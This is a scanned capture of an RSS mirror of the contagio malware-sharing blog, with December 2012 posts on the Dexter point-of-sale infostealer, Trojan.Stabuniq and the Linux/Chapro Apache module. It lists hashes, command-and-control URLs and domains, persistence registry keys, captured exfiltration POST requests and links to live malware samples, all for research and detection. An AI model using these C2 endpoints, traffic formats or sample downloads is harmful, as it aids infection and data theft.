contagio13.rssing.com
Open in
urlscan Pro
185.150.190.192
Public Scan
Submitted URL: http://contagio13.rssing.com/chan-24521930/all_p1.html
Effective URL: https://contagio13.rssing.com/chan-24521930/all_p1.html
Submission: On September 12 via manual from US — Scanned from DE
Effective URL: https://contagio13.rssing.com/chan-24521930/all_p1.html
Submission: On September 12 via manual from US — Scanned from DE
Form analysis
5 forms found in the DOMName: hmsearch — GET
<form name="hmsearch" method="get">
<input type="text" name="q" id="cs-header-menu-search-form-input" placeholder="Type and press enter..." value="" onkeydown="return dogsearch_if13(document.hmsearch.q.value, document.hmsearch.stype.value, event.keyCode);">
<input type="text" name="dummy" style="visibility:hidden">
<select name="stype" style="visibility:hidden">
<option selected="" value="rssing.com">RSSing.com</option>
</select>
</form>
Name: searchbox_1 — GET
<form name="searchbox_1" method="get">
<div class="input-group wrapped-text-input">
<input type="text" name="q" placeholder="search RSSing.com...." value="" onkeydown="return dogsearch_if13(document.searchbox_1.q.value, document.searchbox_1.stype.value,event.keyCode);">
<div class="input-group-prepend">
<a class="cs-btn cs-btn-medium " href="javascript:;" onclick="dogsearch(document.searchbox_1.q.value, document.searchbox_1.stype.value);">Search</a>
</div>
</div>
<input type="text" name="dummy" style="display:none">
<select name="stype" style="display:none">
<option selected="" value="rssing.com">RSSing.com</option>
</select>
</form>
Name: searchbox_2 — GET
<form name="searchbox_2" method="get">
<div class="input-group wrapped-text-input">
<input type="text" name="q" placeholder="search RSSing.com...." value="" onkeydown="return dogsearch_if13(document.searchbox_2.q.value, document.searchbox_2.stype.value,event.keyCode);">
<div class="input-group-prepend">
<a class="cs-btn cs-btn-medium " href="javascript:;" onclick="dogsearch(document.searchbox_2.q.value, document.searchbox_2.stype.value);">Search</a>
</div>
</div>
<input type="text" name="dummy" style="display:none">
<select name="stype" style="display:none">
<option selected="" value="rssing.com">RSSing.com</option>
</select>
</form>
Name: searchbox_3 — GET
<form name="searchbox_3" method="get">
<div class="input-group wrapped-text-input">
<input type="text" name="q" placeholder="search RSSing.com...." value="" onkeydown="return dogsearch_if13(document.searchbox_3.q.value, document.searchbox_3.stype.value,event.keyCode);">
<div class="input-group-prepend">
<a class="cs-btn cs-btn-medium " href="javascript:;" onclick="dogsearch(document.searchbox_3.q.value, document.searchbox_3.stype.value);">Search</a>
</div>
</div>
<input type="text" name="dummy" style="display:none">
<select name="stype" style="display:none">
<option selected="" value="rssing.com">RSSing.com</option>
</select>
</form>
Name: searchbox_4 — GET
<form name="searchbox_4" method="get">
<div class="input-group wrapped-text-input">
<input type="text" name="q" placeholder="search RSSing.com...." value="" onkeydown="return dogsearch_if13(document.searchbox_4.q.value, document.searchbox_4.stype.value,event.keyCode);">
<div class="input-group-prepend">
<a class="cs-btn cs-btn-medium " href="javascript:;" onclick="dogsearch(document.searchbox_4.q.value, document.searchbox_4.stype.value);">Search</a>
</div>
</div>
<input type="text" name="dummy" style="display:none">
<select name="stype" style="display:none">
<option selected="" value="rssing.com">RSSing.com</option>
</select>
</form>
Text Content
WE VALUE YOUR PRIVACY We and our partners store and/or access information on a device, such as cookies and process personal data, such as unique identifiers and standard information sent by a device for personalised ads and content, ad and content measurement, and audience insights, as well as to develop and improve products. With your permission we and our partners may use precise geolocation data and identification through device scanning. You may click to consent to our and our partners’ processing as described above. Alternatively you may click to refuse to consent or access more detailed information and change your preferences before consenting. Please note that some processing of your personal data may not require your consent, but you have a right to object to such processing. Your preferences will apply to this website only. You can change your preferences at any time by returning to this site or visit our privacy policy. MORE OPTIONSDISAGREEAGREE * Login * Account * Sign Up * Home * About Us * Catalog * Search * Register RSS * Embed RSS * FAQ * Get Embed Code * Example: Default CSS * Example: Custom CSS * Example: Custom CSS per Embedding * Super RSS * Usage * View Latest * Create * Contact Us * Technical Support * Guest Posts/Articles * Report Violations * Google Warnings * Article Removal Requests * Channel Removal Requests * General Questions * DMCA Takedown Notice * RSSing>> * Collections: * RSSing * EDA * Intel * Mesothelioma * SAP * SEO * Latest * Articles * Channels * Super Channels * Popular * Articles * Pages * Channels * Super Channels * Top Rated * Articles * Pages * Channels * Super Channels * Trending * Articles * Pages * Channels * Super Channels Switch Editions? German Edition (Deutsch) Cancel AddThis Sharing Buttons Share to FacebookFacebookShare to TwitterTwitterShare to PrintPrintShare to EmailEmailShare to PinterestPinterestShare to GmailGmailShare to LinkedInLinkedInShare to Email AppEmail AppShare to TumblrTumblrShare to MoreAddThis English RSSing.com RSSing>> Latest Popular Top Rated Trending Channel: contagio SUBSCRIBE Remove ADS NSFW? Claim 0 Mark channel Not-Safe-For-Work? cancel confirm NSFW Votes: (0 votes) Are you the publisher? Claim or contact us about this channel. No ratings yet. Showing article 1 to 20 of 71 in channel 24521930 Channel Details: * Title: contagio * Channel Number: 24521930 * Language: eng * Registered On: November 28, 2013, 12:57 pm * Number of Articles: 71 * Latest Snapshot: July 9, 2022, 11:37 am * RSS URL: http://contagiodump.blogspot.com/rss.xml * Publisher: http://contagiodump.blogspot.com/ * Description: malware dump * Catalog: //contagio13.rssing.com/catalog.php?indx=24521930 Viewing all 71 articles Page 1 Page 2 Page 3 Last Page Browse latest View live DEC 2012 DEXTER - POS INFOSTEALER SAMPLES AND INFORMATION December 22, 2012, 11:50 pm Next Dec. 2012 Trojan.Stabuniq samples - financial infostealer trojan 0 0 Image may be NSFW. Clik here to view.End of the year presents. Point of Sale (POS) infostealer, aka Dexter. I got 3 more "tester-type" samples and added them below - in addition to the well known 4 samples mentioned by Seculert. You can read more about it here: Seculert Dexter - Draining blood out of Point of Sales TrendMicro Infostealer Dexter Targets Checkout Systems Verizon: Dexter: More of the same, or hidden links? Volatility labs Unpacking Dexter POS "Memory Dump Parsing" Malware Trustwave labs: The Dexter Malware: Getting Your Hands Dirty Symantec Infostealer.Dexter Files The following are MD5s of Dexter related malware samples: (Seculert Dexter - Draining blood out of Point of Sales ) 2d48e927cdf97413523e315ed00c90ab 94c604e5cff7650f60049993405858dfc96f8ac5b77587523d37a8f8f3d9c1bc 70feec581cd97454a74a0d7c1d3183d1 cae3cdaaa1ec224843e1c3efb78505b2e0781d70502bedff5715dc0e9b561785 f84599376e35dbe1b33945b64e1ec6ab b27aadd3ddca1af7db6f441c6401cf74b1561bc828e19f9104769ef2d158778e ed783ccea631bde958ac64185ca6e6b6 fb46ea9617e0c8ead0e4358da6233f3706cfc6bbbeba86a87aaab28bb0b21241 Additional Files 65f5b1d0fcdaff431eec304a18fb1bd6 7e327be39260fe4bb8923af25a076cd3569df54e0328c7fe5cd7c6a2d3312674 560566573de9df114677881cf4090e79 28a26fe50e2d4e2b541ae083aa0236bd484c7eb3b30cf9b5a7f4d579e77bf438 1f03568616524188425f92afbea3c242 bdbe024a08c9a4e62c5692762aa03b4c1e564b38510cb4b4b1758e371637edb4 Download Image may be NSFW. Clik here to view.Download 7 samples listed above (email me if you need the password) General information > Samples > 2d48e927cdf97413523e315ed00c90ab (Seculert MD5) > f84599376e35dbe1b33945b64e1ec6ab (Seculert MD5) > ed783ccea631bde958ac64185ca6e6b6 (Seculert MD5) > all contain http://193.107.17.126/test/gateway.phpfor C2 communications > (Verizon: Dexter: More of the same, or hidden links? ): U:\FirmWork\Studio\Common\Bin.exe in strings is found i ed783ccea631bde958ac64185ca6e6b6 (Seculert MD5) 2d48e927cdf97413523e315ed00c90ab (Seculert MD5) f84599376e35dbe1b33945b64e1ec6ab (Seculert MD5) 560566573de9df114677881cf4090e79 1f03568616524188425f92afbea3c242 65f5b1d0fcdaff431eec304a18fb1bd6 @@PAUH in strings found in all 9 files Individual file information 1 70feec581cd97454a74a0d7c1d3183d1 (Seculert MD5) ===================================================================== cae3cdaaa1ec224843e1c3efb78505b2e0781d70502bedff5715dc0e9b561785 70feec581cd97454a74a0d7c1d3183d1 (Seculert MD5) %userprofile%\Application Data\fubqq\fubqq.exe injected in iexplore.exe Image may be NSFW. Clik here to view. or e,g, POST http://fabcaa97871555b68aa095335975e613.com:80/portal1/gateway.php or any of the domains below (Verizon: Dexter: More of the same, or hidden links? ): 11e2540739d7fbea1ab8f9aa7a107648.com 7186343a80c6fa32811804d23765cda4.com e7dce8e4671f8f03a040d08bb08ec07a.com e7bc2d0fceee1bdfd691a80c783173b4.com 815ad1c058df1b7ba9c0998e2aa8a7b4.com 67b3dba8bc6778101892eb77249db32e.com fabcaa97871555b68aa095335975e613.com | <- | | -> | | Total | | Frames Bytes | | Frames Bytes | | Frames Bytes | 173.255.196.136 <-> 172.16.253.130 150 37230 120 7200 270 44430 172.16.253.255 <-> 172.16.253.1 107 35324 0 0 107 35324 > ASCI strings > GetSystemWindowsDirectoryW > KERNEL32.dll > C:\Debugger.fgh > ,vr1 > ---snip---- > ModuleReplace.exe > LoadMemberData > ?RenameCommand@@YG_JPAUIRootStorage@@PAUHUMPD__@@@Z > ?RenameFortation@@YG_JPAUIRootStorage@@PAUHUMPD__@@@Z > ?RenameHerbal@@YG_JPAUIRootStorage@@PAUHUMPD__@@@Z > ?RenameLoadMac@@YG_JPAUIRootStorage@@PAUHUMPD__@@@Z > ?RenameOptimize@@YG_JPAUIRootStorage@@PAUHUMPD__@@@Z > ?RenameTest@@YG_JPAUIRootStorage@@PAUHUMPD__@@@Z > VS_VERSION_INFO > StringFileInfo > 040904B0 > CompanyName > Microsoft Corporation > FileDescription > Microsoft Help and Support > FileVersion > 6.1.7600.16385 (win7_rtm.090713-1255) > InternalName > HelpPane.exe > LegalCopyright > Microsoft Corporation. All rights reserved. > OriginalFilename > HelpPane.exe > ProductName > Microsoft > Windows > Operating System > ProductVersion > 6.1.7600.16385 2 2D48E927CDF97413523E315ED00C90AB (Seculert MD5) ===================================================================== 94c604e5cff7650f60049993405858dfc96f8ac5b77587523d37a8f8f3d9c1bc %userprofile%\Application Data\pmnnw\pmnnw.exe http://193.107.17.126:80/test/gateway.php | Frames Bytes | | Frames Bytes | | Frames Bytes | 172.16.253.255 <-> 172.16.253.1 1003 335116 0 0 1003 335116 193.107.17.126 <-> 172.16.253.130 264 16368 88 5280 352 21648 > ASCI Strings > T7M > #nR > U:\FirmWork\Studio\Common\Bin.exe > AssistCoop.exe > ?FancyBack@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z > ?OptimusIO@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z > ?OptionWindowGear@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z pcap and traffic same as above. 3 ED783CCEA631BDE958AC64185CA6E6B6 (Seculert MD5) ======================================================================== fb46ea9617e0c8ead0e4358da6233f3706cfc6bbbeba86a87aaab28bb0b21241 %userprofile%\Application Data\jikmr\jikmr.exe http://193.107.17.126:80/test/gateway.php 172.16.253.255 <-> 172.16.253.1 108 35676 0 0 108 35676 193.107.17.126 <-> 172.16.253.129 30 1860 9 540 39 2400 pbk }64 > ASCI Strings > U:\FirmWork\Studio\Common\Bin.exe > Vljdsevr > ----snip----- > SHLWAPI.dll > TeamReg.exe > ?FancyBack@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z > ?ForsakenQuantum@@YGKPAUHKEY__@@PAUHPALETTE__@@@Z > ?OptimusIO@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z > ?OptionWindowGear@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z 4 F84599376E35DBE1B33945B64E1EC6AB (Seculert MD5) ======================================================================== b27aadd3ddca1af7db6f441c6401cf74b1561bc828e19f9104769ef2d158778e %userprofile%\Application Data\yebcs\yebcs.exe http://193.107.17.126:80/test/gateway.php ASCI strings > TkJ > U:\FirmWork\Studio\Common\Bin.exe > Kagtklnuhjchep > Trebuchet MS > ------snip------------ > GetQueueStatus > USER32.dll > TeamReg.exe > ?FancyBack@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z > ?ForsakenQuantum@@YGKPAUHKEY__@@PAUHPALETTE__@@@Z > ?OptimusIO@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z Additional samples 5 1F03568616524188425F92AFBEA3C242 ======================================================================== bdbe024a08c9a4e62c5692762aa03b4c1e564b38510cb4b4b1758e371637edb4 1F03568616524188425F92AFBEA3C242 %userprofile%\Application Data\pstwx\pstwx.exe \SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN %userprofile%\Application Data\pstwx\pstwx.exe Injected in iexplore.exe Process ID: 2756 (iexplore.exe) Process doesn't appear to be a service PIDPortLocal IPState Remote IP:Port 2756TCP 1130 172.16.253.129 SYN SENT193.107.17.126:80 http://193.107.17.126:80/test/gateway.php Conversations | Frames Bytes | | Frames Bytes | | Frames Bytes | 172.16.253.255 <-> 172.16.253.1 13 3016 0 0 13 3016 193.107.17.126 <-> 172.16.253.129 3 186 1 60 4 246 WHOIS Source: RIPE NCC IP Address: 193.107.17.126 Country: Seychelles Network Name: IDEALSOLUTION Owner Name: Ideal Solution Ltd From IP: 193.107.16.0 To IP: 193.107.19.255 Allocated: Yes Contact Name: Ideal Solution NOC Address: Sound & Vision House, Francis Rachel Str., Victoria, Mahe, Seychelles Email: ideal.solutions.org@gmail.com However, real location is in Russia http://bgp.he.net/AS58001#_whois http://bgp.he.net/AS58001#_peers role: Ideal Solution NOCaddress: Sound & Vision House, Francis Rachel Str. address: Victoria, Mahe, Seychelles remarks: *************************************** remarks: This is Ideal-Solution and 2x4.ru IP network remarks Image may be NSFW. Clik here to view. 6 65F5B1D0FCDAFF431EEC304A18FB1BD6 ====================================================================== 7e327be39260fe4bb8923af25a076cd3569df54e0328c7fe5cd7c6a2d3312674 65F5B1D0FCDAFF431EEC304A18FB1BD6 %userprofile%\Application Data\kwqpn\kwqpn.exe http://193.107.17.126:80/test/gateway.php | Frames Bytes | | Frames Bytes | | Frames Bytes | 172.16.253.255 <-> 172.16.253.1 30 9000 0 0 30 9000 193.107.17.126 <-> 172.16.253.131 9 558 2 120 11 678 pcap and traffic same as above. ASCI Strings RSDSB > U:\FirmWork\Studio\Common\Bin.exe > AssistCoop.exe > ?FancyBack@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z > ?OptimusIO@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z > ?OptionWindowGear@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z > ?RegardSeven@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z > ?RightApocoloptus@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z 7 560566573de9df114677881cf4090e79 ====================================================================== 28a26fe50e2d4e2b541ae083aa0236bd484c7eb3b30cf9b5a7f4d579e77bf438 Application Data\aewtm\aewtm.exe URL http://193.107.17.126:80/test/gateway.php ASCI Strings > RSDS > U:\FirmWork\Studio\Common\Bin.exe > AssistCoop.exe > ?FancyBack@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z > ?OptimusIO@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z > ?OptionWindowGear@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z > ?RegardSeven@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z Search RSSing.com -------------------------------------------------------------------------------- DEC. 2012 TROJAN.STABUNIQ SAMPLES - FINANCIAL INFOSTEALER TROJAN December 23, 2012, 10:17 pm Next Dec 2012 Linux.Chapro - trojan Apache iframer Previous Dec 2012 Dexter - POS Infostealer samples and information 0 0 Image may be NSFW. Clik here to view. Holiday presents. Research: Symantec. Trojan.Stabuniq Found on Financial Institution Servers More research: Stabuniq in-Depth by Emanuele De Lucia Here is a another minor news maker of 2012. It is very well detected by most AV but if you want to play or make IDS or yara signatures, the pcap and the sample is below. File File: stabuniq_F31B797831B36A4877AA0FD173A7A4A2 Size: 79360 MD5: F31B797831B36A4877AA0FD173A7A4A2 Download Image may be NSFW. Clik here to view.Download Email me if you need the password Download pcap for F31B797831B36A4877AA0FD173A7A4A2 File information F31B797831B36A4877AA0FD173A7A4A2 ======================================================================== 5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb Created files: C:\Program Files\7-Zip\Uninstall\smagent.exe << copy of itself F31B797831B36A4877AA0FD173A7A4A2 Injected in iexplore.exe Process ID: 1536 (iexplore.exe) 1536 TCP 1130 172.16.253.129 SYN SENT 205.234.252.212:80 At this point domains maybe sinkholed Download pcap for F31B797831B36A4877AA0FD173A7A4A2 POST /rssnews.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: benhomelandefit.com Content-Length: 1093 Cache-Control: no-cache id=NzQxKDYoNig3&varname=SmdzdGc=&comp=QkNKSl5S&ver=UW9oYmlxdSZeVg==&src=NTREb3I=&sec=0&view=dWtnYWNocihjfmMmKyY5DHFrb3Z0cHVjKGN+YyYrJjkMcnRnaHVqZ3JpdChjfmMmKyY5DGVrYihjfmMmKyY5DGpnaGF2Z2VtKGN+YyYrJjkMSmdoYVN2YmdyY3QoY35jJismOQxla2IoY35jJismOQxla2IoY35jJismOQxSVkdzcmlFaWhoY2VyKGN+YyYrJjkMcXVlaHJgfyhjfmMmKyY5DGdqYShjfmMmKyY5DFJWR3NyaUVpaGhVcGUoY35jJismOQxwa3JpaWp1YihjfmMmKyY5DHFiYGthdChjfmMmKyY5DGtiayhjfmMmKyY5DGx3dShjfmMmKyY5DGNtdGgoY35jJismOQx1cGVuaXVyKGN+YyYrJjkMR2V0f2pvZVVjdHBvZWMoY35jJismOQxlcmBraWgoY35jJismOQxwa3JpaWp1YihjfmMmKyY5DHRzaGJqajU0KGN+YyYrJjkMdXZpaWp1cChjfmMmKyY5DGN+dmppdGN0KGN+YyYrJjkMdXBlbml1cihjfmMmKyY5DHVwZW5pdXIoY35jJismOQx1cGVuaXVyKGN+YyYrJjkMdXBlbml1cihjfmMmKyY5DHVwZW5pdXIoY35jJismOQxwa2dlcm5qdihjfmMmKyY5DGp1Z3V1KGN+YyYrJjkMdWN0cG9lY3UoY35jJismOQxxb2hqaWFpaChjfmMmKyY5DGV1dHV1KGN+YyYrJjkMdWt1dShjfmMmKyY5DFV/dXJjayYrJjkMXVV/dXJjayZWdGllY3V1WyYrJjkM&dat=&page=RTxaVnRpYXRnayZAb2pjdVoxK1xvdlpTaG9odXJnampadWtnYWNocihjfmM=&val=cnB5b3dub3BjZnRyZ2ZweWlyaXllYmdmZnhibHh4YWp5anN5b2x3YmxkeGRpcG9k&up=rpyownopcftrgfpy&xid=ZTU0N2BlPzMrZzc+NisyNWRiK2cyMzUrMDI1ZzNkNDBnNmA1 POST /rssnews.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: sovereutilizeignty.com Content-Length: 1093 Cache-Control: no-cache id=NzQxKDYoNig3&varname=SmdzdGc=&comp=QkNKSl5S&ver=UW9oYmlxdSZeVg==&src=NTREb3I=&sec=0&view=dWtnYWNocihjfmMmKyY5DHFrb3Z0cHVjKGN+YyYrJjkMcnRnaHVqZ3JpdChjfmMmKyY5DGVrYihjfmMmKyY5DGpnaGF2Z2VtKGN+YyYrJjkMSmdoYVN2YmdyY3QoY35jJismOQxla2IoY35jJismOQxla2IoY35jJismOQxSVkdzcmlFaWhoY2VyKGN+YyYrJjkMcXVlaHJgfyhjfmMmKyY5DGdqYShjfmMmKyY5DFJWR3NyaUVpaGhVcGUoY35jJismOQxwa3JpaWp1YihjfmMmKyY5DHFiYGthdChjfmMmKyY5DGtiayhjfmMmKyY5DGx3dShjfmMmKyY5DGNtdGgoY35jJismOQx1cGVuaXVyKGN+YyYrJjkMR2V0f2pvZVVjdHBvZWMoY35jJismOQxlcmBraWgoY35jJismOQxwa3JpaWp1YihjfmMmKyY5DHRzaGJqajU0KGN+YyYrJjkMdXZpaWp1cChjfmMmKyY5DGN+dmppdGN0KGN+YyYrJjkMdXBlbml1cihjfmMmKyY5DHVwZW5pdXIoY35jJismOQx1cGVuaXVyKGN+YyYrJjkMdXBlbml1cihjfmMmKyY5DHVwZW5pdXIoY35jJismOQxwa2dlcm5qdihjfmMmKyY5DGp1Z3V1KGN+YyYrJjkMdWN0cG9lY3UoY35jJismOQxxb2hqaWFpaChjfmMmKyY5DGV1dHV1KGN+YyYrJjkMdWt1dShjfmMmKyY5DFV/dXJjayYrJjkMXVV/dXJjayZWdGllY3V1WyYrJjkM&dat=&page=RTxaVnRpYXRnayZAb2pjdVoxK1xvdlpTaG9odXJnampadWtnYWNocihjfmM=&val=cnB5b3dub3BjZnRyZ2ZweWlyaXllYmdmZnhibHh4YWp5anN5b2x3YmxkeGRpcG9k&up=rpyownopcftrgfpy&xid=ZTU0N2BlPzMrZzc+NisyNWRiK2cyMzUrMDI1ZzNkNDBnNmA1 $2jX The following information is from Symantec: http://www.symantec.com/security_response/writeup.jsp?docid=2012-121809-2437-99&tabid=2 > When the Trojan is executed, it may create the following files: > %ProgramFiles%\[FOLDER NAME ONE]\[FOLDER NAME TWO]\acroiehelper.exe > %ProgramFiles%\[FOLDER NAME ONE]\[FOLDER NAME TWO]\groovemonitor.exe > %ProgramFiles%\[FOLDER NAME ONE]\[FOLDER NAME TWO]\issch.exe > %ProgramFiles%\[FOLDER NAME ONE]\[FOLDER NAME TWO]\jqs.exe > %ProgramFiles%\[FOLDER NAME ONE]\[FOLDER NAME TWO]\smagent.exe > The variable [FOLDER NAME ONE] may be one of the following: > AcroIEHelper Module > GrooveMonitor Utility > InstallShield Update Service Scheduler > Java Quick Starter > SoundMAX service agent > The variable [FOLDER NAME TWO] may be one of the following: > Bin > Helper > Installer > Uninstall > Update > Next, the Trojan creates the following registry entries so that it runs every > time Windows starts: > HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"[RANDOM > GUID]" = "[FILE NAME]" > HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"[RANDOM > GUID]" = "[FILE NAME]" > HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\"[RANDOM > GUID]" = "[FILE NAME]" > The Trojan then creates the following registry entry: > HKEY_CURRENT_USER\Software\Stability Software\"Uniq" = "[RANDOM GUID]" > Next, the Trojan may collect the following information from the compromised > computer: > Architecture type > Computer name > File name of the threat > IP address > Operating system version > Operating system service pack version, if installed > Running processes > The Trojan may then send the stolen information to the following remote > locations: > anatwriteromist.com > bbcnews192.com > belsaw920.com > benhomelandefit.com > midfielderguin.com > prominentpirsa.com > sovereutilizeignty.com > yolanda911.com Automatic scans https://www.virustotal.com/file/5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb/analysis/ SHA256: 5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb SHA1: 17db1bbaa1bf1b920e47b28c3050cbff83ab16de MD5: f31b797831b36a4877aa0fd173a7a4a2 File size: 77.5 KB ( 79360 bytes ) File name: vti-rescan File type: Win32 EXE Tags: peexe armadillo Detection ratio: 28 / 45 Analysis date: 2012-12-21 13:48:23 UTC ( 2 days, 16 hours ago ) AhnLab-V3 Backdoor/Win32.Ruskill 20121221 AntiVir TR/Graftor.27095.3 20121221 Avast Win32:Ruskill-FQ [Trj] 20121221 AVG Dropper.Generic6.CAIC 20121221 BitDefender Gen:Variant.Graftor.27095 20121221 DrWeb Trojan.Packed.22607 20121221 Emsisoft Gen:Variant.Graftor.27095 (B) 20121221 ESET-NOD32 a variant of Win32/Injector.RVT 20121221 F-Secure Gen:Variant.Graftor.27095 20121221 Fortinet W32/Injector.RVT!tr 20121221 GData Gen:Variant.Graftor.27095 20121221 Ikarus Worm.Win32.Dorkbot 20121221 Kaspersky HEUR:Trojan.Win32.Generic 20121221 Malwarebytes Backdoor.Bot.wpm 20121221 McAfee Generic.dx!bg3a 20121221 Microsoft Trojan:Win32/Buniq.A 20121221 MicroWorld-eScan Gen:Variant.Graftor.27095 20121221 NANO-Antivirus Trojan.Win32.Graftor.ymdbi 20121221 Norman W32/Suspicious_Gen4.BCNST 20121221 Panda Generic Malware 20121221 PCTools Trojan.Stabuniq 20121221 Sophos Mal/FakeAV-QN 20121221 SUPERAntiSpyware - 20121220 Symantec Trojan.Stabuniq 20121221 TheHacker Trojan/Injector.rvt 20121220 TrendMicro TROJ_STABUNIQ.A 20121221 TrendMicro-HouseCall TROJ_STABUNIQ.A 20121221 VIPRE Trojan.Win32.Generic!BT 20121221 DEC 2012 LINUX.CHAPRO - TROJAN APACHE IFRAMER December 23, 2012, 10:56 pm Next * * * Merry Christmas and Happy New Year! * * * Previous Dec. 2012 Trojan.Stabuniq samples - financial infostealer trojan 0 0 Image may be NSFW. Clik here to view.Here is another notable development of 2012 - Linux malware (see Wirenet trojan posted earlier too) Research: ESET Malicious Apache module used for content injection: Linux/Chapro.A All the samples are below. I did not test it thus no pcaps this time. ------Linux/Chapro.A e022de72cce8129bd5ac8a0675996318 ------Injected iframe 111e3e0bf96b6ebda0aeffdb444bcf8d ------Java exploit 2bd88b0f267e5aa5ec00d1452a63d9dc ------Zeus binary 3840a6506d9d5c2443687d1cf07e25d0 Download Image may be NSFW. Clik here to view. Download. (Email me if you need the password scheme - see profile for email) ------Linux/Chapro.A e022de72cce8129bd5ac8a0675996318 ------Java exploit 2bd88b0f267e5aa5ec00d1452a63d9dc ------Zeus binary 3840a6506d9d5c2443687d1cf07e25d0 Automatic scans Analysis ESET Malicious Apache module used for content injection: https://www.virustotal.com/file/345a86f839372db0ee7367be0b9df2d2d844cef406407695a2f869d6b3380ece/analysis/ SHA256:345a86f839372db0ee7367be0b9df2d2d844cef406407695a2f869d6b3380ece SHA1:2ccb789d57d3ce3dd929307eb78878e6e5c61ccf MD5:e022de72cce8129bd5ac8a0675996318 File size:38.3 KB ( 39176 bytes ) File name:e022de72cce8129bd5ac8a0675996318 File type:ELF Tags:elf Detection ratio:19 / 46 Analysis date: 2012-12-21 19:12:13 UTC ( 2 days, 11 hours ago ) AVGGeneric6_c.CLGW20121221 BitDefenderBackdoor.Linux.Agent.E20121221 CAT-QuickHeal-20121220 Commtouch-20121221 ComodoUnclassifiedMalware20121221 DrWebLinux.Iframe.120121221 ESET-NOD32Linux/Chapro.A20121221 F-SecureBackdoor.Linux.Agent.E20121221 GDataBackdoor.Linux.Agent.E20121221 IkarusBackdoor.Linux.Apmod20121221 JiangminBackdoor/Linux.fs20121221 K7AntiVirusTrojan20121221 KasperskyHEUR:Backdoor.Linux.Apmod.gen20121221 MicroWorld-eScanBackdoor.Linux.Agent.E20121221 nProtectBackdoor.Linux.Agent.E20121221 PCToolsMalware.Linux-Chapro20121221 SophosTroj/Apmod-D20121221 SUPERAntiSpyware-20121221 SymantecLinux.Chapro20121221 TrendMicroELF_CHAPRO.A20121221 TrendMicro-HouseCallELF_CHAPRO.A20121221 ViRobotLinux.A.Apmod.3917620121221 Exploit:Java/CVE-2012-1723 https://www.virustotal.com/file/a70a8891829344ad3db818b3c4ad76e38a78b0ce3c43d7aaf65752fe56d10e09/analysis/ SHA256:a70a8891829344ad3db818b3c4ad76e38a78b0ce3c43d7aaf65752fe56d10e09 SHA1:d01f76f5467c86bfa266c429e1315e7aad821f93 MD5:2bd88b0f267e5aa5ec00d1452a63d9dc File size:30.2 KB ( 30957 bytes ) File name:nYCND File type:ZIP Tags:exploit zip cve-2012-1723 Detection ratio:2 / 43 Analysis date: 2012-11-23 09:54:46 UTC ( 1 month ago ) KasperskyUDS:DangerousObject.Multi.Generic20121123 MicrosoftExploit:Java/CVE-2012-1723!generic20121123 https://www.virustotal.com/file/12f38f9be4df1909a1370d77588b74c60b25f65a098a08cf81389c97d3352f82/analysis/ SHA256:12f38f9be4df1909a1370d77588b74c60b25f65a098a08cf81389c97d3352f82 SHA1:5050b57e01bb2aa9730f826f36ad4d41477d8bd9 MD5:3840a6506d9d5c2443687d1cf07e25d0 File size:222.0 KB ( 227328 bytes ) File name:3840a6506d9d5c2443687d1cf07e25d0 File type:Win32 EXE Tags:peexe Detection ratio:32 / 44 Analysis date: 2012-12-22 20:02:23 UTC ( 1 day, 10 hours ago ) AgnitumTrojan.Injector!5xrrtg7IXGQ20121222 AntiVirTR/PSW.Zbot.288420121222 AvastWin32:Crypt-OMW [Trj]20121222 AVGPSW.Generic10.AOEA20121222 BitDefenderTrojan.Generic.821892520121222 ComodoTrojWare.Win32.Trojan.Agent.Gen20121222 DrWebTrojan.PWS.Panda.36820121222 ESET-NOD32a variant of Win32/Injector.ZRA20121222 F-SecureTrojan.Generic.821892520121222 FortinetW32/Zbot.ARO!tr20121222 GDataTrojan.Generic.821892520121222 IkarusTrojan.Win32.Yakes20121222 JiangminTrojanSpy.Zbot.csit20121221 K7AntiVirusSpyware20121221 KasperskyTrojan-Spy.Win32.Zbot.gmeq20121222 KingsoftWin32.Troj.Zbot.gm.(kcloud)20121217 MalwarebytesTrojan.Agent20121222 McAfeePWS-Zbot.gen.aro20121222 McAfee-GW-EditionPWS-Zbot.gen.aro20121222 MicrosoftPWS:Win32/Zbot20121222 NormanW32/ZBot.DIJG20121222 nProtectTrojan.Generic.821892520121222 PandaTrj/Genetic.gen20121222 PCToolsTrojan-PSW.Generic!rem20121222 SophosMal/Zbot-JM20121222 SUPERAntiSpywareTrojan.Agent/Gen-Zbot20121222 SymantecInfostealer20121222 TheHackerTrojan/Injector.zra20121222 TrendMicroTROJ_GEN.R21CDLF20121222 TrendMicro-HouseCallTROJ_GEN.R21CDLF20121222 VBA32TrojanSpy.Zbot.gmeq20121221 VIPRETrojan.Win32.Generic!BT20121222 * * * MERRY CHRISTMAS AND HAPPY NEW YEAR! * * * December 24, 2012, 10:07 pm Next ZeroAccess / Sirefef Rootkit - 5 fresh samples Previous Dec 2012 Linux.Chapro - trojan Apache iframer 0 0 Image may be NSFW. Clik here to view. More presents to come, pa rum pum pum pum rum pum pum pum, rum pum pum pum ZEROACCESS / SIREFEF ROOTKIT - 5 FRESH SAMPLES December 25, 2012, 11:02 pm Next Dec. 2012 Skynet Tor 